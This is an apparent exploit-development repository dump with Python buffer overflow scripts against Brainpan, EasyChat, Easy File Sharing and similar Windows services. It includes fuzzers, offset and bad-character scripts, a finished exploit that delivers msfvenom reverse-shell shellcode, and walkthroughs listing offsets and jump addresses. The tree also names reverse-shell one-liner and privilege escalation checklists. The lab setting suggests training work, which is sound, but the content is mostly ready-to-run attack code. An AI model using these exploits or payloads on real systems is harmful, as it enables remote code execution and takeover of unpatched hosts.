├── BufferOverflow ├── Brainpain │ ├── APp brianpain walk │ ├── Offset.py │ ├── Pattern.py │ ├── bad_chat.py │ ├── fuzz.py │ ├── shell_code │ └── shellcode.py ├── EasyChat │ ├── Bad_char.py │ ├── Fuzz.py │ ├── Offset.py │ ├── Pattern.py │ ├── Shellcode.py │ └── Walkthough ├── Easy_FIle_Share │ ├── Bad_char.py │ ├── Easy_fileSHare walkthought │ ├── Fuzz.py │ ├── Offset.py │ ├── Pattern.py │ └── Shellcode.py ├── Echo_memcpy │ ├── Bad_char.py │ ├── Eip_control.py │ ├── fuzz.py │ └── offset.py ├── Echo_server │ ├── Eip_control.py │ ├── bad_char.py │ ├── fuzz.py │ ├── offset.py │ ├── shellcode.py │ └── untitled ├── Echo_server_V2 │ ├── Eip_control.py │ ├── bad_char.py │ ├── extra_op.py │ ├── extra_op2.py │ ├── fuzz.py │ ├── offset.py │ ├── shellcode.py │ └── walkthi ├── FLoatFTP │ ├── @old │ │ ├── badc1.py │ │ ├── badc2.py │ │ ├── badchar.py │ │ ├── exploit.py │ │ ├── newoffset.py │ │ ├── pattern.py │ │ └── ty.py │ ├── Eip_control.py │ ├── ShellCode.py │ ├── bad_char.py │ ├── exploit_code │ ├── fuzz.py │ ├── offset.py │ ├── ret_add │ ├── return_add.py │ └── writewup ├── Freesshd │ ├── Bad_char.py │ ├── Eip_control.py │ ├── Pattern.py │ ├── fuzz.py │ ├── offset.py │ ├── shell.txt │ ├── shellcode.py │ └── wakjhtough ├── MicroP │ ├── Bad_char.py │ ├── Bad_char2.py │ ├── Bad_char3.py │ ├── Eip_control.mppl │ ├── bad_char.mppl │ ├── bad_char2.mppl │ ├── bad_char3.mppl │ ├── crash.mppl │ ├── eip_control-py.txt │ ├── eip_control.py │ ├── offset.py │ ├── pattern.mppl │ ├── pattern.py │ ├── raw_shellcode │ ├── shellcode.mppl │ ├── shellcode.py │ ├── shellcode2.mppl │ ├── shellcode2.py │ └── walkthough_microp ├── SLMail │ ├── Bad_char.py │ ├── EIP_control.py │ ├── Fuzz.py │ ├── Ofset.py │ ├── Pattern.py │ ├── SLmail Walkthough │ └── Shellcode.py ├── Savent WebServer │ ├── Eip_over.py │ ├── Pattern.py │ ├── Walkthought- SaventServer │ ├── fuzz.py │ └── ty.py ├── Script │ ├── BOF sc.zip │ ├── BOF sc │ │ ├── Eip_control.py │ │ ├── Eip_controlsd.py │ │ ├── ShellCode.py │ │ ├── 
bad_char │ │ ├── bad_char.py │ │ ├── bad_chat.py │ │ ├── bc_len.py │ │ ├── fuzz.py │ │ ├── offset.py │ │ └── return_add.py │ ├── Eip_control.py │ ├── Eip_controlsd.py │ ├── ShellCode.py │ ├── bad_char │ ├── bad_char.py │ ├── fuzz.py │ ├── offset.py │ └── return_add.py ├── SimpleWebserver │ ├── Eip_control.py │ ├── Pattern.py │ ├── Shellcode.py │ ├── Walk │ ├── badchar.py │ └── fuzzer.py ├── SyncBreeze-Server │ ├── Bad_cahr.py │ ├── EIP_control.py │ ├── Fuzz.py │ ├── Offset.py │ ├── Pattern.py │ ├── Shellcode.py │ └── Walk though ├── Vuln Part2 │ ├── Eip_control.py │ ├── ShellCode.py │ ├── bad_char │ ├── bad_char.py │ ├── exploit_code │ ├── fuzz.py │ ├── index │ ├── offset.py │ ├── ret_add │ ├── return_add.py │ └── spike.spk ├── VulnServer │ ├── Eip_control.py │ ├── ShellCode.py │ ├── Vuln Part2 │ │ ├── Eip_control.py │ │ ├── ShellCode.py │ │ ├── bad_char │ │ ├── bad_char.py │ │ ├── exploit_code │ │ ├── fuzz.py │ │ ├── index │ │ ├── offset.py │ │ ├── ret_add │ │ ├── return_add.py │ │ └── spike.spk │ ├── Writeup Vuln Server │ ├── bad_char │ ├── bad_char.py │ ├── exploit_code │ ├── fuzz.py │ ├── offset.py │ ├── ret_add │ ├── return_add.py │ └── spike.spk ├── WarFTp │ ├── BadChar.py │ ├── Fuzz.py │ ├── Offset.py │ ├── Pattern.py │ └── Walkthough wartpo ├── crossfire │ ├── ShellCode.py │ ├── bad_char.py │ ├── eip.py │ ├── fuzz.py │ ├── offset.py │ └── walk ├── dostackbufferoverflowgood │ ├── Bad_char.py │ ├── EIP.py │ ├── Fuzz.py │ ├── Pattern.py │ ├── Shellcode.py │ ├── WalkTHorugh │ ├── shellcode │ └── ty.py └── fileserver │ ├── bad_char.py │ ├── fuzz.py │ ├── offset_verify.py │ ├── pattern.py │ ├── shellcode.py │ └── walkthoufh ├── CTF_template.ctb └── Checklist ├── File_trr ├── Linx_priv ├── List payloads ├── Oneliner_erverse_shell ├── Port_forwarding ├── TTY ├── WinPriEsc_Checklist ├── buffer overflow checklist └── inital_Foot_hold /BufferOverflow/Brainpain/APp brianpain walk: -------------------------------------------------------------------------------- 1 | App 
brianpain 2 | IP 192.168.0.134 3 | port 9999 4 | 5 | 6 | 7 | 1. fuzzing remoter server "A" *700 8 | 9 | 2. Send pattern adn find EIP 35724134 10 | 11 | 3. finding offsert 524 12 | 13 | 4. Finding bad-char "\x00" 14 | 15 | 5. generating shellcode (msfvenom -p Windows/shell_reverse_tcp LHOS=1192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00\") 16 | 17 | 6. find JMP ESP "\xff\xe4" "\xf3\x12\x17\x31" 18 | 19 | 7. Sending final exploit -------------------------------------------------------------------------------- /BufferOverflow/Brainpain/Offset.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | 3 | \ 4 | 5 | buffer ="A" * 524 + "B" *4 + badchar 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.0.134',9999)) 10 | print "Sending Exploit to remote system......." 11 | s.send((buffer)) 12 | s.recv(1024) 13 | s.close() 14 | 15 | 16 | 17 | except: 18 | print("Unable to connect to remote server ......") 19 | -------------------------------------------------------------------------------- /BufferOverflow/Brainpain/Pattern.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | 3 | 4 | buffer ="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A" 5 | 6 | try: 7 | 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 8 | s.connect(('192.168.0.134',9999)) 9 | print "Sending Exploit to remote system......." 10 | s.send((buffer)) 11 | s.recv(1024) 12 | s.close() 13 | 14 | 15 | 16 | except: 17 | print("Unable to connect to remote server ......") 18 | -------------------------------------------------------------------------------- /BufferOverflow/Brainpain/bad_chat.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | 5 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 6 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 7 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 8 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 9 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 10 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 11 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 12 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 13 | 14 | 15 | 16 | buffer ="A" * 524 + "B" *4 + badchars 17 | 18 | try: 19 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 20 | s.connect(('192.168.0.134',9999)) 21 | print "Sending Exploit to remote system......." 
22 | s.send((buffer)) 23 | s.recv(1024) 24 | s.close() 25 | 26 | 27 | 28 | except: 29 | print("Unable to connect to remote server ......") 30 | -------------------------------------------------------------------------------- /BufferOverflow/Brainpain/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 100 5 | eob = "HTTP/1.1\r\n\r\n" 6 | while True: 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.0.134',9999)) 10 | print "Trying with buffer length %d" % len(buffer) 11 | s.send((buffer)) 12 | s.recv(1024) 13 | s.close() 14 | 15 | buffer=buffer + "A"*100 16 | 17 | 18 | except: 19 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 20 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/Brainpain/shell_code: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/shell_reverse_tcp LHOS=1192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00" 2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 3 | [-] No arch selected, selecting arch: x86 from the payload 4 | Found 11 compatible encoders 5 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 6 | x86/shikata_ga_nai succeeded with size 351 (iteration=0) 7 | x86/shikata_ga_nai chosen with final size 351 8 | Payload size: 351 bytes 9 | Final size of c file: 1500 bytes 10 | unsigned char buf[] = 11 | "\xba\xd2\xd8\xc8\x29\xdb\xc3\xd9\x74\x24\xf4\x5b\x33\xc9\xb1" 12 | "\x52\x83\xc3\x04\x31\x53\x0e\x03\x81\xd6\x2a\xdc\xd9\x0f\x28" 13 | "\x1f\x21\xd0\x4d\xa9\xc4\xe1\x4d\xcd\x8d\x52\x7e\x85\xc3\x5e" 14 | "\xf5\xcb\xf7\xd5\x7b\xc4\xf8\x5e\x31\x32\x37\x5e\x6a\x06\x56" 15 | "\xdc\x71\x5b\xb8\xdd\xb9\xae\xb9\x1a\xa7\x43\xeb\xf3\xa3\xf6" 16 | "\x1b\x77\xf9\xca\x90\xcb\xef\x4a\x45\x9b\x0e\x7a\xd8\x97\x48" 17 | 
"\x5c\xdb\x74\xe1\xd5\xc3\x99\xcc\xac\x78\x69\xba\x2e\xa8\xa3" 18 | "\x43\x9c\x95\x0b\xb6\xdc\xd2\xac\x29\xab\x2a\xcf\xd4\xac\xe9" 19 | "\xad\x02\x38\xe9\x16\xc0\x9a\xd5\xa7\x05\x7c\x9e\xa4\xe2\x0a" 20 | "\xf8\xa8\xf5\xdf\x73\xd4\x7e\xde\x53\x5c\xc4\xc5\x77\x04\x9e" 21 | "\x64\x2e\xe0\x71\x98\x30\x4b\x2d\x3c\x3b\x66\x3a\x4d\x66\xef" 22 | "\x8f\x7c\x98\xef\x87\xf7\xeb\xdd\x08\xac\x63\x6e\xc0\x6a\x74" 23 | "\x91\xfb\xcb\xea\x6c\x04\x2c\x23\xab\x50\x7c\x5b\x1a\xd9\x17" 24 | "\x9b\xa3\x0c\xb7\xcb\x0b\xff\x78\xbb\xeb\xaf\x10\xd1\xe3\x90" 25 | "\x01\xda\x29\xb9\xa8\x21\xba\x06\x84\x29\xbd\xef\xd7\x29\xc5" 26 | "\x3d\x5e\xcf\xaf\xd1\x37\x58\x58\x4b\x12\x12\xf9\x94\x88\x5f" 27 | "\x39\x1e\x3f\xa0\xf4\xd7\x4a\xb2\x61\x18\x01\xe8\x24\x27\xbf" 28 | "\x84\xab\xba\x24\x54\xa5\xa6\xf2\x03\xe2\x19\x0b\xc1\x1e\x03" 29 | "\xa5\xf7\xe2\xd5\x8e\xb3\x38\x26\x10\x3a\xcc\x12\x36\x2c\x08" 30 | "\x9a\x72\x18\xc4\xcd\x2c\xf6\xa2\xa7\x9e\xa0\x7c\x1b\x49\x24" 31 | "\xf8\x57\x4a\x32\x05\xb2\x3c\xda\xb4\x6b\x79\xe5\x79\xfc\x8d" 32 | "\x9e\x67\x9c\x72\x75\x2c\xbc\x90\x5f\x59\x55\x0d\x0a\xe0\x38" 33 | "\xae\xe1\x27\x45\x2d\x03\xd8\xb2\x2d\x66\xdd\xff\xe9\x9b\xaf" 34 | "\x90\x9f\x9b\x1c\x90\xb5"; -------------------------------------------------------------------------------- /BufferOverflow/Brainpain/shellcode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | 5 | shellcode = ("\xba\xd2\xd8\xc8\x29\xdb\xc3\xd9\x74\x24\xf4\x5b\x33\xc9\xb1" 6 | "\x52\x83\xc3\x04\x31\x53\x0e\x03\x81\xd6\x2a\xdc\xd9\x0f\x28" 7 | "\x1f\x21\xd0\x4d\xa9\xc4\xe1\x4d\xcd\x8d\x52\x7e\x85\xc3\x5e" 8 | "\xf5\xcb\xf7\xd5\x7b\xc4\xf8\x5e\x31\x32\x37\x5e\x6a\x06\x56" 9 | "\xdc\x71\x5b\xb8\xdd\xb9\xae\xb9\x1a\xa7\x43\xeb\xf3\xa3\xf6" 10 | "\x1b\x77\xf9\xca\x90\xcb\xef\x4a\x45\x9b\x0e\x7a\xd8\x97\x48" 11 | "\x5c\xdb\x74\xe1\xd5\xc3\x99\xcc\xac\x78\x69\xba\x2e\xa8\xa3" 12 | "\x43\x9c\x95\x0b\xb6\xdc\xd2\xac\x29\xab\x2a\xcf\xd4\xac\xe9" 13 | 
"\xad\x02\x38\xe9\x16\xc0\x9a\xd5\xa7\x05\x7c\x9e\xa4\xe2\x0a" 14 | "\xf8\xa8\xf5\xdf\x73\xd4\x7e\xde\x53\x5c\xc4\xc5\x77\x04\x9e" 15 | "\x64\x2e\xe0\x71\x98\x30\x4b\x2d\x3c\x3b\x66\x3a\x4d\x66\xef" 16 | "\x8f\x7c\x98\xef\x87\xf7\xeb\xdd\x08\xac\x63\x6e\xc0\x6a\x74" 17 | "\x91\xfb\xcb\xea\x6c\x04\x2c\x23\xab\x50\x7c\x5b\x1a\xd9\x17" 18 | "\x9b\xa3\x0c\xb7\xcb\x0b\xff\x78\xbb\xeb\xaf\x10\xd1\xe3\x90" 19 | "\x01\xda\x29\xb9\xa8\x21\xba\x06\x84\x29\xbd\xef\xd7\x29\xc5" 20 | "\x3d\x5e\xcf\xaf\xd1\x37\x58\x58\x4b\x12\x12\xf9\x94\x88\x5f" 21 | "\x39\x1e\x3f\xa0\xf4\xd7\x4a\xb2\x61\x18\x01\xe8\x24\x27\xbf" 22 | "\x84\xab\xba\x24\x54\xa5\xa6\xf2\x03\xe2\x19\x0b\xc1\x1e\x03" 23 | "\xa5\xf7\xe2\xd5\x8e\xb3\x38\x26\x10\x3a\xcc\x12\x36\x2c\x08" 24 | "\x9a\x72\x18\xc4\xcd\x2c\xf6\xa2\xa7\x9e\xa0\x7c\x1b\x49\x24" 25 | "\xf8\x57\x4a\x32\x05\xb2\x3c\xda\xb4\x6b\x79\xe5\x79\xfc\x8d" 26 | "\x9e\x67\x9c\x72\x75\x2c\xbc\x90\x5f\x59\x55\x0d\x0a\xe0\x38" 27 | "\xae\xe1\x27\x45\x2d\x03\xd8\xb2\x2d\x66\xdd\xff\xe9\x9b\xaf" 28 | "\x90\x9f\x9b\x1c\x90\xb5") 29 | #311712F3 30 | 31 | 32 | 33 | buffer ="A" * 524 + "\xf3\x12\x17\x31" + "\x90" * 20 + shellcode 34 | 35 | 36 | try: 37 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 38 | s.connect(('192.168.0.134',9999)) 39 | print "Sending Exploit to remote system......." 
40 | s.send((buffer)) 41 | s.recv(1024) 42 | s.close() 43 | 44 | 45 | 46 | except: 47 | print("Unable to connect to remote server ......") 48 | -------------------------------------------------------------------------------- /BufferOverflow/EasyChat/Bad_char.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | 6 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 7 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 8 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 9 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 10 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 11 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 12 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 13 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 14 | 15 | 16 | fuzz = "A" * 216 + '\xEB\x06\x90\x90' + '\x7f\x22\x00\x10' + '\x90' *16 + badchars 17 | 18 | buffer = 'GET /chat.ghp?username=' + fuzz + '&password=test&room=1&sex=1 HTTP/1.1\r\n\r\n' 19 | buffer += 'Host: 192.168.0.134\r\n\r\n' 20 | 21 | 22 | try: 23 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 24 | s.connect(('192.168.0.134',80)) 25 | print ('Sending Payload........') 26 | s.send(buffer) 27 | s.close() 28 | 29 | 30 | 31 | except: 32 | print ('Unable to Connect 
!........') 33 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/EasyChat/Fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | from time import sleep 6 | 7 | 8 | 9 | fuzz = 'A' * 100 10 | 11 | buffer = 'GET /chat.ghp?username=' + fuzz + '&password=test&room=1&sex=1 HTTP/1.1\r\n\r\n' 12 | buffer += 'Host: 192.168.0.134\r\n\r\n' 13 | 14 | while True: 15 | try: 16 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 17 | s.connect(('192.168.0.134',80)) 18 | print '[*] Fuzzing username with buffer length: ' + str(len(fuzz)) 19 | s.send(buffer) 20 | s.close() 21 | sleep (1) 22 | buffer = 'GET /chat.ghp?username=' + fuzz + '&password=test&room=1&sex=2 HTTP/1.1\r\n' 23 | buffer += 'Host: 192.168.0.134\r\n\r\n' 24 | fuzz += 'A' * 100 25 | 26 | except: 27 | print '[*] Crash occurred at buffer length: ' + str(len(fuzz)-50) 28 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/EasyChat/Offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | 6 | 7 | 8 | 9 | fuzz = "A" * 221 + "B" * 4 + "C" * 100 10 | 11 | buffer = 'GET /chat.ghp?username=' + fuzz + '&password=test&room=1&sex=1 HTTP/1.1\r\n\r\n' 12 | buffer += 'Host: 192.168.0.134\r\n\r\n' 13 | 14 | 15 | try: 16 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 17 | s.connect(('192.168.0.134',80)) 18 | print ('Sending Payload........') 19 | s.send(buffer) 20 | s.close() 21 | 22 | 23 | 24 | except: 25 | print ('Unable to Connect !........') 26 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/EasyChat/Pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | 
6 | 7 | 8 | 9 | fuzz = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq" 10 | 11 | buffer = 'GET /chat.ghp?username=' + fuzz + '&password=test&room=1&sex=1 HTTP/1.1\r\n\r\n' 12 | buffer += 'Host: 192.168.0.134\r\n\r\n' 13 | 14 | 15 | try: 16 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 17 | s.connect(('192.168.0.134',80)) 18 | print ('Sending Payload........') 19 | s.send(buffer) 20 | s.close() 21 | 22 | 23 | 24 | except: 25 | print ('Unable to Connect !........') 26 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/EasyChat/Shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import struct 5 | 6 | target_ip = '192.168.0.134' 7 | target_port = 80 8 | jmp_esp= struct.pack("34684133 11 | 12 | 3. Calculating Offset 221 13 | 14 | 4. Checking OFfset 15 | 16 | 5. Finding POP POP RETN => POP r32 POP r32 RETN 17 | { 18 | 1000227F 5D POP EBP (\x7f\x22\x00\x10) 19 | 10002280 5B POP EBX 20 | 10002281 C3 RETN 21 | } 22 | 23 | 6. 
Finding Bad Char \x00\x20\x0a\x0d -------------------------------------------------------------------------------- /BufferOverflow/Easy_FIle_Share/Bad_char.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 7 | "\x21\x22\x23\x24\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 8 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5d\x5e\x5f" 9 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 10 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 11 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 12 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 13 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 14 | 15 | 16 | 17 | buff = "A" * 4500 18 | buff+= badchars 19 | buff+= "D" * (5000 -len(buff)) 20 | 21 | 22 | try: 23 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 24 | s.connect(('192.168.0.134',80)) 25 | print "Sending paylaod..........." 
26 | s.send(("GET " + buff + " HTTP/1.1\r\n")) 27 | s.recv(1024) 28 | s.close() 29 | 30 | except: 31 | print("Unable to connect.......") 32 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/Easy_FIle_Share/Easy_fileSHare walkthought: -------------------------------------------------------------------------------- 1 | APP Easy File Sharing 2 | 3 | IP : 192.168.0.134 4 | 5 | Port :80 6 | PORT STATE SERVICE VERSION 7 | 80/tcp open http Easy File Sharing Web Server httpd 6.9 8 | __________________________________________________________ 9 | 10 | 1. Crashing remote app at 4500 11 | 12 | 2. Send pattern and find EIp => 46356646 13 | 14 | 3. Finding offset 4065 15 | 16 | 4. Find badchar "\x00\x20" 17 | 18 | 5. IFnding POP POP RET => !mona seh 19 | 20 | 6. SEH protection so finf 21 | { 22 | 23 | !mona seh 24 | find seqxuwnce of instruction POP r32 POP r32 RETN 25 | Executable modules, item 3 26 | Base=10000000 27 | Size=00050000 (327680.) 28 | Entry=1001AB40 ImageLoa. 29 | Name=ImageLoa 30 | Path=C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll 31 | 32 | } 33 | 34 | 35 | 7. 
Shelloce 36 | 37 | -------------------------------------------------------------------------------- /BufferOverflow/Easy_FIle_Share/Fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | buff = "A" * 100 7 | 8 | while True: 9 | try: 10 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 11 | s.connect(('192.168.0.134',80)) 12 | print "Trying with buffer length %d" % len(buff) 13 | s.send(("GET " + buff + " HTTP/1.0\r\n\r\n")) 14 | s.recv(1024) 15 | s.close() 16 | 17 | buff=buff + "A"*100 18 | 19 | 20 | except: 21 | print("Fuzzing Crashed at %s by" % str(len(buff))) 22 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/Easy_FIle_Share/Offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | buff = "A" * 4059 + "B" * 4 + "C" * 4 7 | buff+="A" * (4183 - len(buff)) 8 | buff+= "D" * 4 9 | buff+="A" * (5000-len(buff)) 10 | 11 | 12 | try: 13 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 14 | s.connect(('192.168.0.134',80)) 15 | print "Sending paylaod..........." 
